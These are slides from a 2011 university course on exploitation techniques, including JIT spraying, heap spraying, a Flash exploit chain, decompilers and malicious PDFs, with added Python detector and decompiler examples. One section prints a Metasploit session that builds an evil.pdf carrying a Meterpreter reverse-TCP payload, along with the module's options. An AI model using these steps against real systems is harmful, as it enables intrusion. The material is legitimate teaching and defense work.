EECS 354: A Survey of Techniques to Facilitate Exploitation
Jonathan Friedman, Max Goldman, Brian Lange, Josiah Matlack, Aaron Steinfeld
November 29, 2011
Overview
JIT Spraying
Heap Spraying
Application-specific Exploits
Decompilers
File Format Vulnerabilities
Demo
JIT Spraying
Introduced by Dionysus Blazakis in 2010
Designed to overcome ASLR and DEP
JIT output is executable
“Spraying” covers the heap in exploit code
Used in ActionScript code
Predictable address space layout
Implemented by chaining XOR operations on chosen constants
JIT Spraying (cont)
var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )
03470069 B8 D9D0543C  MOV EAX, 3C54D0D9
0347006E 35 5890903C  XOR EAX, 3C909058
03470073 35 6AF4593C  XOR EAX, 3C59F46A
03470078 35 01C8903C  XOR EAX, 3C90C801
0347007D 35 D930903C  XOR EAX, 3C9030D9
03470082 35 5B53533C  XOR EAX, 3C53535B
JIT Spraying (cont)
var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )
The same bytes, decoded starting one byte later (at 0347006A instead of 03470069):
0347006A D9D0   FNOP
0347006C 54     PUSH ESP
0347006D 3C 35  CMP AL, 35
0347006F 58     POP EAX
03470070 90     NOP
03470071 90     NOP
03470072 3C 35  CMP AL, 35
03470074 6A F4  PUSH -0C
03470076 59     POP ECX
03470077 3C 35  CMP AL, 35
03470079 01C8   ADD EAX, ECX
0347007B 90     NOP
0347007C 3C 35  CMP AL, 35
0347007E D930   FSTENV DS:[EAX]
JIT Spraying (cont)
Defenses exist
Signature detection
▪ Looks for NOPs
▪ High false-positive rate
Heuristics
▪ Look at XORed values
▪ Stateful
▪ Look for short jumps
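The "look at XORed values" heuristic above, worked through as an added example (this is not code from the slides or from any shipping defense). The JIT encoding follows exactly what the listing on the previous slide shows, `MOV EAX, imm32` (opcode B8) then `XOR EAX, imm32` (opcode 35) per constant; the function names, the 0x3C top-byte rule and the minimum chain length are my assumptions, and the two expressions it scans are constructed samples.

```python
"""Toy detector for the JIT-spray pattern shown on the slides."""
import struct

# Opcodes the slides show the JIT emitting (32-bit x86).
MOV_EAX_IMM32 = 0xB8
XOR_EAX_IMM32 = 0x35


def jit_encode(constants):
    """Emit the byte stream the JIT produces for c0 ^ c1 ^ ... ^ cn."""
    out = bytearray([MOV_EAX_IMM32]) + struct.pack("<I", constants[0])
    for c in constants[1:]:
        out += bytes([XOR_EAX_IMM32]) + struct.pack("<I", c)
    return bytes(out)


def xor_immediates(code):
    """Recover the immediates of a MOV/XOR-EAX chain from a byte stream."""
    imms, i = [], 0
    while i + 5 <= len(code) and code[i] in (MOV_EAX_IMM32, XOR_EAX_IMM32):
        imms.append(struct.unpack_from("<I", code, i + 1)[0])
        i += 5
    return imms


def suspicious_xor_chain(constants, min_len=4):
    """Heuristic from the slides: look at the XORed values.

    A constant whose top byte is 0x3C becomes `CMP AL, imm8` when the stream
    is read one byte off, swallowing the next opcode byte; a long chain of
    such constants is what the slide example looks like. Legitimate code
    rarely XORs many immediates that all share that top byte, but this is
    still a heuristic and can misfire (the false-positive caveat above).
    """
    return len(constants) >= min_len and all((c >> 24) == 0x3C for c in constants)


def scan(code, min_len=4):
    """Return (is_suspicious, recovered_constants) for a JIT output buffer."""
    imms = xor_immediates(code)
    return suspicious_xor_chain(imms, min_len), imms


# The expression from the slides, reused here as one constructed sample.
SLIDE_CONSTANTS = [0x3c54d0d9, 0x3c909058, 0x3c59f46a, 0x3c90c801, 0x3c9030d9, 0x3c53535b]
# A constructed benign expression with unrelated constants.
BENIGN_CONSTANTS = [0x00000001, 0x0000ff00, 0x12345678, 0x3c000000]

if __name__ == "__main__":
    for name, consts in (("slide", SLIDE_CONSTANTS), ("benign", BENIGN_CONSTANTS)):
        flagged, imms = scan(jit_encode(consts))
        print(name, "suspicious" if flagged else "clean", [hex(i) for i in imms])
```

The scanner is stateless on purpose so the comparison with the slide's "stateful" heuristic is clear: it only sees one chain of immediates at a time, and a spray split across many small functions would need the per-thread or per-heap bookkeeping the slide alludes to.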
Heap Spraying
Modified heap overflow technique used to overcome address space randomization
Allocates “blocks” throughout heap containing a nop sled followed by malicious code
Increases the chance of malicious code being executed
Heap Spraying (cont)
NOZZLE: Heap Spraying Defense
Developed by Microsoft Research in 2008
Defends against heap spraying by:
1. Scanning each individual object on the heap, looking for NOP sleds followed by shellcode
2. Looking for heaps with a high proportion of malicious objects
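Both NOZZLE checks, reduced to a toy, as an added example (not the slides' material and not Microsoft Research's NOZZLE code). Real NOZZLE disassembles every byte offset of an object and measures the reachable "surface area"; this version only looks for runs of the single-byte NOP (0x90), so the thresholds, function names and the in-memory heap it scans are all my constructions.

```python
"""Simplified NOZZLE-style heap scan: per-object sled check, then heap ratio."""

NOP = 0x90


def longest_nop_run(obj):
    """Length of the longest run of 0x90 bytes and the index just past it."""
    best, best_end, run = 0, 0, 0
    for i, b in enumerate(obj):
        run = run + 1 if b == NOP else 0
        if run > best:
            best, best_end = run, i + 1
    return best, best_end


def object_is_sled(obj, min_sled=32, min_tail=8):
    """Check 1 from the slide: a NOP sled followed by something else."""
    run, end = longest_nop_run(obj)
    return run >= min_sled and len(obj) - end >= min_tail


def heap_is_sprayed(heap, max_ratio=0.5, **kw):
    """Check 2 from the slide: too high a proportion of sled-like objects.

    Returns (alarm, ratio) so a caller can log the ratio even when no alarm
    fires; one suspicious object on its own is not a spray.
    """
    if not heap:
        return False, 0.0
    flagged = sum(object_is_sled(o, **kw) for o in heap)
    ratio = flagged / len(heap)
    return ratio > max_ratio, ratio


# Constructed heaps: ordinary allocations, and one full of sled-like objects.
TEXT_OBJ = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
ZERO_OBJ = bytes(128)
# A NOP run followed by arbitrary non-NOP bytes standing in for a payload.
SLED_OBJ = bytes([NOP]) * 200 + bytes(range(1, 40))
NORMAL_HEAP = [TEXT_OBJ, ZERO_OBJ, TEXT_OBJ * 2, bytes(range(256))]
SPRAYED_HEAP = [TEXT_OBJ, ZERO_OBJ] + [SLED_OBJ] * 10

if __name__ == "__main__":
    for name, heap in (("normal", NORMAL_HEAP), ("sprayed", SPRAYED_HEAP)):
        alarm, ratio = heap_is_sprayed(heap)
        print(f"{name}: {len(heap)} objects, {ratio:.0%} sled-like, alarm={alarm}")
```

The `min_tail` parameter encodes the "followed by shellcode" half of check 1: a buffer that is nothing but 0x90 (a legitimate alignment pad, say) is not flagged, which is where a pure NOP-count scanner picks up its false positives.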
Application-specific Exploits
Exploit a vulnerability specific to an application to corrupt memory
Can be quite complex and difficult to prevent or debug
In order to help prevent these exploits, code should be tested extensively
Error codes are your friend: check them
Application-specific Exploits (cont)
Example: Adobe Flash
A parameter can be set to a negative value
This guarantees a failed allocation whose return value is never checked
The program then does pointer arithmetic between this (now NULL) pointer and a user-input value
This allows the user to write to memory
But this isn't directly useful, because the value written is only marginally of the hacker's choosing
So what do we do?
Application-specific Exploits (cont)
Example (cont): ActionScript VM
Flash can also execute ActionScript from a Flash file
The ActionScript VM verifies its input using bitmasks from memory, but then executes the input directly
Overwriting these bitmasks with the previous exploit allows us to execute unverified code
Now save EIP, replace it with a selected pointer, and execute a return to jump to that pointer (presumably at some shellcode loaded in the Flash file)
Then restore the saved EIP and return like nothing happened
Decompilers
Decode the binary-file format
Decode the machine instructions into assembly code for that machine
Perform semantic analysis to recover some low-level data types, such as long variables, and to simplify the decoded instructions based on their semantics
Decompilers (cont)
Store the information in a suitable intermediate representation
If a suitable intermediate language is used, the next two steps can be used with any assembly language to generate any procedural HLL code.
Perform data flow analysis to remove low-level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.
Decompilers (cont)
Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level)
Perform type analysis to recover HLL data types such as arrays and structures.
Generate HLL code from the transformed intermediate code.
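The data-flow step of the procedure above, worked on the listing from the JIT-spraying slide as an added example (not code from the slides or from any real decompiler). It lifts the listing into a tiny intermediate representation and forward-substitutes every register read with the expression that last defined it, so registers, a low-level aspect absent from HLLs, disappear and an HLL expression remains. The mnemonic set, register list and function names are my own choices; only MOV, XOR, ADD and SUB with register or hex-immediate operands are handled.

```python
"""Toy decompiler back end: lift a listing, then remove registers by data-flow."""
import re

MNEMONICS = {"MOV", "XOR", "ADD", "SUB"}
OPS = {"XOR": "^", "ADD": "+", "SUB": "-"}
REGISTERS = {"EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "EBP", "ESP"}
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")


def lift(listing):
    """Parse 'address bytes mnemonic dst, src' lines into IR tuples."""
    ir = []
    for line in listing.strip().splitlines():
        tokens = line.split()
        # Address and encoded bytes precede the mnemonic; take the first known one.
        idx = next((i for i, t in enumerate(tokens) if t in MNEMONICS), None)
        if idx is None:
            raise ValueError(f"cannot lift: {line!r}")
        operands = [o.strip() for o in " ".join(tokens[idx + 1:]).split(",")]
        if len(operands) != 2 or operands[0] not in REGISTERS:
            raise ValueError(f"unsupported operands in: {line!r}")
        ir.append((tokens[idx], operands[0], operands[1]))
    return ir


def operand_expr(op, env):
    """Map an operand to (expression text, top-level operator or None)."""
    if op in REGISTERS:
        # A register never written in this listing is an input of the routine.
        return env.get(op, (op.lower(), None))
    if HEX_RE.match(op):
        return f"0x{int(op, 16):x}", None
    raise ValueError(f"unsupported operand: {op!r}")


def dataflow(ir):
    """Forward-substitute definitions: register -> (expression, top operator)."""
    env = {}
    for mnem, dst, src in ir:
        rhs, rhs_op = operand_expr(src, env)
        if rhs_op is not None:
            rhs = f"({rhs})"  # a compound source keeps its own grouping
        if mnem == "MOV":
            env[dst] = (rhs, None)
            continue
        op = OPS[mnem]
        lhs, lhs_op = operand_expr(dst, env)
        if lhs_op is not None and lhs_op != op:
            lhs = f"({lhs})"  # mixing operators needs explicit parentheses
        env[dst] = (f"{lhs} {op} {rhs}", op)
    return env


def decompile(listing, result="EAX"):
    """Return the HLL expression held in `result` at the end of the listing."""
    env = dataflow(lift(listing))
    return env.get(result, (result.lower(), None))[0]


# The listing from the JIT-spraying slide, used here as the sample input.
JIT_LISTING = """
03470069 B8 D9D0543C MOV EAX,3C54D0D9
0347006E 35 5890903C XOR EAX,3C909058
03470073 35 6AF4593C XOR EAX,3C59F46A
03470078 35 01C8903C XOR EAX,3C90C801
0347007D 35 D930903C XOR EAX,3C9030D9
03470082 35 5B53533C XOR EAX,3C53535B
"""

if __name__ == "__main__":
    print(f"var y = ({decompile(JIT_LISTING)});")
```

Run against the slide's listing this recovers the original ActionScript expression, which is the point of the intermediate representation: the same substitution code would serve any assembly language whose front end produces the same IR tuples.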
File Format Vulnerabilities
In the news…
Duqu: installer recently found in the form of a .doc file
iOS jailbreaks: have taken advantage of PDF and TIFF handling vulnerabilities
File Format Vulnerabilities (cont)
At their most abstract level: things handle files. Specially craft the file, and you may be able to manipulate the thing.
Things: programs, OSs
Files: documents, images, videos
Manipulate: crash, reverse engineer, execute arbitrary code
Why so popular?
1. They’re more stealthy.
2. They’re getting easier to do.
Tools of the Trade
File format fuzzers: 4f and Metasploit
Brute-force approach
Metasploit can also be used to automate attacks, as usual for kids!
Prevention
1. Don’t be stupid.
2. Client-side antivirus
3. Keeping software up to date
PDF Exploit Using Metasploit
Metasploit can inject executable code into a .pdf file, which will launch on startup
Exploited on Windows XP SP3 with Adobe Reader 8.0 and below
Also works on Foxit Reader
After exploiting the .pdf, the .exe injection will run automatically
Exploit code
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost
LHOST => localhost
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf
INFILENAME => test.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started reverse handler
[*] Reading in 'test.pdf'...
[*] Parseing 'test.pdf'...
[*] Parseing Successfull.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.
Additional Options
EXENAME  The name of the payload exe.
FILENAME  The output filename (default: evil.pdf).
INFILENAME  The input PDF filename.
LAUNCH_MESSAGE  The message to display in the File: area (default: To view the encrypted content please tick the "Do not show this message again" box and press Open.)
ContextInformationFile  The information file that contains context information
DisablePayloadHandler  Disable the handler code for the selected payload
EXE::Custom  Use custom exe instead of automatically generating a payload exe
EXE::FallBack  Use the default template in case the specified one is missing
EXE::Inject  Set to preserve the original EXE function
EXE::OldMethod  Set to use the substitution EXE generation method.
EXE::Path  The directory in which to look for the executable template
EXE::Template  The executable template file name.
EnableContextEncoding  Use transient context when encoding payloads
VERBOSE  Enable detailed status messages
WORKSPACE  Specify the workspace for this module
WfsDelay  Additional delay when waiting for a session
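A defender's counterpart to the session above, as an added example (not from the slides and not Metasploit code). It assumes, based on the LAUNCH_MESSAGE option and the "launch on startup" behaviour described on the previous slide, that the module's PDF carries an embedded file plus a launch action, and it triages a document for those PDF name objects without opening it in a reader. The signal weights, function names and the two PDFs it scans are my constructions; the "suspicious" sample contains no executable content, only the dictionary entries a reader would react to.

```python
"""Static triage of PDF bytes for launch / embedded-file / script constructs."""
import re

# Name objects that turn a document into something more than static pages,
# with a weight per hit (weights are an assumption for this example).
SIGNALS = {
    b"/Launch": 3,        # action that runs an external application or file
    b"/EmbeddedFile": 2,  # file attached inside the PDF
    b"/OpenAction": 1,    # action that fires when the document is opened
    b"/JavaScript": 2,
    b"/JS": 1,
    b"/AA": 1,            # additional (automatic) actions on events
}

NAME_RE = re.compile(rb"/[A-Za-z]+")


def scan_pdf(data):
    """Return (score, {signal: count}) for raw PDF bytes."""
    counts = {}
    for name in NAME_RE.findall(data):
        if name in SIGNALS:
            key = name.decode()
            counts[key] = counts.get(key, 0) + 1
    score = sum(SIGNALS[k.encode()] * v for k, v in counts.items())
    return score, counts


def has_object_streams(data):
    """Names inside /ObjStm streams are compressed and invisible to this scan."""
    return b"/ObjStm" in data


def verdict(data, threshold=3):
    """'suspicious' once the weighted score reaches the threshold, else 'clean'."""
    score, _ = scan_pdf(data)
    return "suspicious" if score >= threshold else "clean"


# Constructed samples: a minimal static PDF and one carrying the risky entries.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"%%EOF\n"
)
LAUNCH_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"4 0 obj << /Type /Action /S /Launch /F (placeholder.exe) >> endobj\n"
    b"5 0 obj << /Type /Filespec /EF << /F 6 0 R >> >> endobj\n"
    b"6 0 obj << /Type /EmbeddedFile /Length 0 >> stream\n\nendstream endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    for name, pdf in (("benign", BENIGN_PDF), ("launch", LAUNCH_PDF)):
        score, counts = scan_pdf(pdf)
        note = " (object streams present: inflate before trusting this)" if has_object_streams(pdf) else ""
        print(f"{name}: {verdict(pdf)} score={score} {counts}{note}")
```

The scan is deliberately plain-text: it will miss names written with `#xx` escapes or tucked inside compressed object streams, which is why `has_object_streams` is reported separately, as a prompt to decompress and rescan rather than a verdict.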
DEMO